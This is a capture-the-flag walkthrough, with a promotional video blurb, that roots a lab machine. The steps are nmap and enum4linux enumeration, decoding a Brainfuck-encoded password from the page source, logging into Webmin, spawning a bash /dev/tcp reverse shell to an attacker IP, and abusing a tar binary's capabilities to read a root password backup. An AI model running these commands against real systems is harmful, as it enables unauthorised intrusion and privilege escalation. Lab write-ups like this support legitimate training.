In this exciting video, join us as we dive deep into the world of ethical hacking and take on the thrilling “Boot to Root CTF Challenge”. This interactive challenge will test your skills and knowledge in cracking a complex code, ultimately leading you to gain full control over the target system.
With our expert guidance, you’ll learn the ropes of this captivating challenge and discover the secrets to mastering it from start to finish. We’ll provide step-by-step instructions and valuable tips on how to approach each level, decode intricate puzzles, uncover hidden vulnerabilities, and exploit them to escalate your privileges.
As we dissect this intriguing CTF challenge, you’ll gain valuable insights into various techniques for privilege escalation, binary exploitation, reverse engineering, web application vulnerabilities, network enumeration, and much more. This hands-on experience will not only enhance your practical skills but also boost your understanding of real-world hacking scenarios.
Join us on this thrilling journey and uncover the strategies that will empower you to become a proficient ethical hacker. With our in-depth explanations and practical demonstrations, you’ll gain the knowledge and confidence to crack even the most intricate codes. So, gear up and get ready to conquer the Boot to Root CTF Challenge like a pro!
Don’t miss out on this incredible opportunity to expand your hacking arsenal and take your skills to new heights. Hit that play button now and embark on an unforgettable adventure filled with challenges, breakthroughs, and endless excitement!
- Network scan
nmap -p- -sV -sC –open 192.168.0.109PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
- Enum4linux
Command: enum4linux -a 192.168.0.109
We found a username here
- Web
If we look at the bottom of the pageโs source code, we see a text encrypted by the brainfuck algorithm.
view-source:http://192.168.0.109/<!–
don’t worry no one will get here, it’s safe to share with you my access. Its encrypted ๐
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.—-.<++++++++++.———–.>———–.++++.<<+.>-.——–.++++++++++++++++++++.<————.>>———.<<++++++.++++++.
–>
Brainfuck/Text/Ook! obfuscator – deobfuscator. Decode and encode online.
Edit description
If we decode, we get the password..2uqPEfj3D<P’a-3
- Reverse Shell
When we look at port 20000, it redirects us to the admin panel with a link
https://192.168.0.109:20000/Username: cyberPassword: .2uqPEfj3D<P’a-3
Once logged in, there is a terminal icon on the bottom left. With its we can carry out orders. Iโll get a reverse shell.bash -i >& /dev/tcp/YourIP/1234 0>&1
- Root
Command: getcap -r / 2>/dev/null/home/cyber/tar cap_dac_read_search=ep
I recently came across an interesting way of escalating privileges on a GNU/Linux system during a CTF challenge. Itโฆ
nxnjz.netcyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bakcyber@breakout:~$ ./tar -xvf old_passcyber@breakout:~$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~hcyber@breakout:~$ su root
And now we are the root
โIf you have any questions or comments, please do not hesitate to write. Have a good daysโ
Leave a Reply